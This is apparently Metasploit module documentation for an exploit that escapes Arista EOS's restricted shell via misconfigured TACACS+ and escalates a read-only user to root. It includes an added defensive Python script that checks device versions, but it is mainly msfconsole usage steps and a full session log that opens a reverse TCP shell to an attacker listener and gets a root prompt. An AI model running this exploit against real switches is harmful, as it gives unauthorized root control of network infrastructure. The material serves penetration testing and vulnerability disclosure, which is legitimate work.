Description
Using TACACS+ with Arista switches running EOS 4.23.1F or earlier, a "Read-Only" user can bypass the built-in roles that are meant to restrict bash commands, leading to privilege escalation. The exploit combines a poorly configured TACACS+ (tac_plus) AAA server with Arista's alternative CLI shells.
Vulnerable Application
This module has been tested successfully on:
- tac_plus Version: 202001211926/PCRE/DES
Additional Vulnerable Tested Hardware/Software Combinations:
- DCS-7280SRAM-48C6-R – 4.22.0.1F
- DCS-7050CX3-32S-R – 4.20.11M
- DCS-7050QX-32S-R – 4.20.9M
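The affected range above is stated as "4.23.1F or earlier", so the first defensive step is an inventory check. The following is an added example, not part of the module or its documentation: it parses EOS version strings (numeric release components followed by a train letter such as F or M), compares them numerically against the last affected release, and audits a constructed inventory built from the tested hardware listed above. It assumes that the train letter does not affect ordering and that `show version` output carries a "Software image version:" line; both are assumptions made here, not facts from the page.

```python
import re
from typing import Dict, List, Optional, Tuple

# Last affected release as stated in the module description ("4.23.1F or earlier").
LAST_AFFECTED = "4.23.1F"

# EOS release strings look like "4.22.0.1F" or "4.20.11M": dotted numbers, optional train letter.
VERSION_RE = re.compile(r"^(\d+(?:\.\d+)+)([A-Za-z]*)$")

# Assumption: EOS "show version" prints a line of this shape (sample text below is constructed).
SHOW_VERSION_RE = re.compile(r"^\s*Software image version:\s*(\S+)\s*$", re.MULTILINE)


def parse_eos_version(version: str) -> Tuple[Tuple[int, ...], str]:
    """Split '4.22.0.1F' into ((4, 22, 0, 1), 'F'). Raises ValueError on unknown formats."""
    m = VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised EOS version string: {version!r}")
    numbers = tuple(int(part) for part in m.group(1).split("."))
    return numbers, m.group(2).upper()


def is_affected(version: str, last_affected: str = LAST_AFFECTED) -> bool:
    """True when the numeric release is less than or equal to the last affected release.

    Assumption: the train letter (F/M) is ignored for ordering. A longer tuple with an
    equal prefix (e.g. 4.23.1.1) compares as later than 4.23.1 and is reported as not affected.
    """
    nums, _ = parse_eos_version(version)
    limit, _ = parse_eos_version(last_affected)
    return nums <= limit


def version_from_show_version(text: str) -> Optional[str]:
    """Extract the image version from (assumed) 'show version' output; None if absent."""
    m = SHOW_VERSION_RE.search(text)
    return m.group(1) if m else None


def audit_inventory(inventory: Dict[str, Tuple[str, str]]) -> List[Tuple[str, str, str, bool]]:
    """Return (hostname, model, version, affected) for each device, affected devices first."""
    findings = [(host, model, ver, is_affected(ver)) for host, (model, ver) in inventory.items()]
    return sorted(findings, key=lambda f: (not f[3], f[0]))


# Constructed inventory: models and versions are the tested combinations from the page,
# hostnames are invented; the last entry is a hypothetical patched device for contrast.
SAMPLE_INVENTORY: Dict[str, Tuple[str, str]] = {
    "sw-core-1": ("DCS-7280SRAM-48C6-R", "4.22.0.1F"),
    "sw-leaf-1": ("DCS-7050CX3-32S-R", "4.20.11M"),
    "sw-leaf-2": ("DCS-7050QX-32S-R", "4.20.9M"),
    "sw-leaf-3": ("DCS-7050QX-32S-R", "4.24.2F"),
}

# Constructed fragment in the assumed 'show version' layout.
SAMPLE_SHOW_VERSION = """Arista DCS-7280SRAM-48C6-R
Software image version: 4.22.0.1F
Architecture: i386
"""

if __name__ == "__main__":
    print("Version from sample 'show version':", version_from_show_version(SAMPLE_SHOW_VERSION))
    for host, model, ver, affected in audit_inventory(SAMPLE_INVENTORY):
        status = "AFFECTED (<= %s)" % LAST_AFFECTED if affected else "not affected"
        print(f"{host:<10} {model:<22} {ver:<10} {status}")
```

Devices reported as affected are candidates for an EOS upgrade or for a review of the TACACS+ authorisation profile that read-only users receive; the check only covers the version condition the page states, not whether a given switch actually has TACACS+ enabled.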
Verification Steps
- Start msfconsole
- use exploit/unix/ssh/arista_tacplus_shell
- set PASSWORD <password>
- set USERNAME <username>
- set LHOST <lhost>
- set RHOST <rhost>
- check
- run
- You should get a root session
Scenario
root@kali:~/git/metasploit-framework# ./msfconsole
=[ metasploit v5.0.92-dev-5ef76ff232 ]
+ -- --=[ 2025 exploits - 1101 auxiliary - 343 post ]
+ -- --=[ 566 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Display the Framework log using the log command, learn more with help log
msf5 > search arista
Matching Modules
================

   #  Name                                   Disclosure Date  Rank   Check  Description
   -  ----                                   ---------------  ----   -----  -----------
   0  exploit/unix/ssh/arista_tacplus_shell  2020-02-02       great  Yes    Arista restricted shell escape (with privesc)
msf5 > use 0
msf5 exploit(unix/ssh/arista_tacplus_shell) > show options
Module options (exploit/unix/ssh/arista_tacplus_shell):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   yes       Password to login with
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     22               yes       The target port
   USERNAME                   yes       Username to login with

Payload options (linux/x86/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   CMD    /bin/sh          yes       The command string to execute
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Universal
msf5 exploit(unix/ssh/arista_tacplus_shell) > set LHOST eth0
LHOST => 10.10.10.20
msf5 exploit(unix/ssh/arista_tacplus_shell) > set RHOSTS 10.10.10.10
RHOSTS => 10.10.10.10
msf5 exploit(unix/ssh/arista_tacplus_shell) > set USERNAME admin
USERNAME => admin
msf5 exploit(unix/ssh/arista_tacplus_shell) > set PASSWORD admin
PASSWORD => admin
msf5 exploit(unix/ssh/arista_tacplus_shell) > check
[+] 10.10.10.10:22 - The target is vulnerable.
msf5 exploit(unix/ssh/arista_tacplus_shell) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.10.20:4444
[*] 10.10.10.10:22 - Attempt to login to the Arista's restricted shell...
msf5 exploit(unix/ssh/arista_tacplus_shell) > [+] SSH connection established.
[*] Requesting pty rbash
[+] Pty successfully obtained.
[*] Requesting a shell.
[+] Spawned into arista rbash shell.
[*] Attempting to break out of Arista rbash...
[+] Escaped from rbash!
[*] Command shell session 1 opened (10.01.10.20:4444 -> 10.10.10.10:51153) at 2020-06-09 15:39:53 -0700
msf5 exploit(unix/ssh/arista_tacplus_shell) > sessions -i 1
[*] Starting interaction with 1...
bash-4.3# whoami
whoami
root
bash-4.3# exit
exit
exit
[*] 10.10.10.10 - Command shell session 1 closed.
msf5 exploit(unix/ssh/arista_tacplus_shell) >